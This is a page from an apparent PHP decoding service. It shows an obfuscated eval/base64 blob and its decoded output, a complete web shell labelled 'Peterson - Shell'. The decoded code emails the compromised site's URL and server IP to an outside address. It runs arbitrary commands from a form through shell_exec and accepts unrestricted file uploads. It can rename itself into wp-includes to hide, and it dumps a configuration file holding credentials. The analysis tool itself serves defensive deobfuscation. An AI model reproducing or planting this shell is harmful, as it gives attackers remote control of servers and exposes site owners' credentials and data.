Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cfsWyjc62DhyuSKUTYAQiQS9FVnUc+gWQ..

Decoded Output download

@ini_restore("disable_functions");
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get  disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Shell Result http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Peterson - Shell</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get  disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}

Did this file decode correctly?

Original Code

<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cfsWyjc62DhyuSKUTYAQiQS9FVnUc+gWQ5dgTspzf5F2To4j/3pldOy8XoLS6KEScmXRz5+XZmZyKXIQVVUhHYPNRyHWaTzir80uJIpfcOdoRM3PvCilO2Z0w8INgMBpeW9PoPvp33TrOQkI7nQchhYqLOkrMcAdUO50FWfGJ4OO//PE1/zKZXIZfU8GE36JJ5Pcb2rH/55UfWcKr8UDrp1LyiAAezCFa2SC/hxjjcDc5+SV4jiAZzSA7VQCBp5TEHcZ0kTDMigSsNvAlzm5CHQlkXQn1Vb7P+n5rMer5dT/q9/nR8w6kEt4ADRGD5yYzz3fOcKwp2K5SAU5IT+WhfF5VNX3MowzscpKW+Q7Pbb0xls1HAb5FXh57zXPsX4wm/somi1F38xIUR1YKapAnp0SRumSR8T3GaN34Xka2Mcg6SHmuR2zY7baVwxq2+d3kg1gWQPUAFE8T/lrOQ9qWHMV6lMSE7fabaS9Yt6X/+JF3JnNpy5/f/cm1FadSDsQdpI4s6iqGaDpLwflrYzkJ+4M//OHZhWIRJRKkqGDeCtQbnV9d+MNWOB6NJtaty7uLZV/kZE0j1DzPCrecl8iVClldzUx7zGtmKPAfVKPD99Do0NB1B+JswfixEiqFk1jqpyxlts9n6467U348rfQHM3XwswJimBR/g/cLi4sUG/TzdP1P3Alql3S6/Lg7eno7KAt4ea/Heu5vfiEKsCRXC3rH5c47QrhPPKZDi8TTjrJUfFEHyxNczu5JyrvvlXhOves46hqex6mNbq176Px0Lz1mUky/nXbk8ejVeIxctULb+RfCNyGVtFuk5TjswwdzW5bn2eRvUpmt0YlLJLiJYzga+thpb1MjTnDiTotz5QJ4xfA+xIvEDISYJDqeQe1WSEhyIXpF70xdi66O1uySKoVceJz9QiivQNVIzlXgIrRu5NOamO6kkb7k/ebm/e4R+5p/fQTld25/qoxyNOOQG5e0BUuk0/Y4P2y7e+dSllJs0vb8S+RyrZhtLMHjCr4pzogWHo+zhGJ3g22aiZXe+OHsIVd4/fsr4rsU2YlotBEoYFi0hwznpyijV3bYfhKpqA28zYaS+ZcMrsq0iBLWFynoLLqE3ldzLpIE8iZLdk/fAMzQvkTTcqKfvDnzs/H2cxRQS3XrULYexJp/Kqax/vRbZkEOC23gLEEjKT0VehiYIBsdn6pydlrC69Vdm/9HsHjL2DYboNb4UdAWKpek3+3oIE2LJhY0bNIKvTB1UATXSVsP6xZkGlEEzIoHCI1iVU/S2y9NqKwMjRUuhnIsrj7FhPJQPG6m5ua3fMBIDgnOsHRzFgbbQwdoHIOUWaHI/d4ZjtnDHg4x9oxqeau4DdWb6uLF0LV3Z0xP67SZm3IF67T5taXNgX7hT5G0jmMIT3mTIz18DWa6cctKq5/9D5dJKtl+Gkwvut360zCN4qjNqch0mBTVPdT7DHpkn1ZcYmEX36QXamgV0UjV/wGcJnR6iu7/AQ==')))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 1b98ade7fff94aa0566f1207317b8580
Eval Count 1
Decode Time 94 ms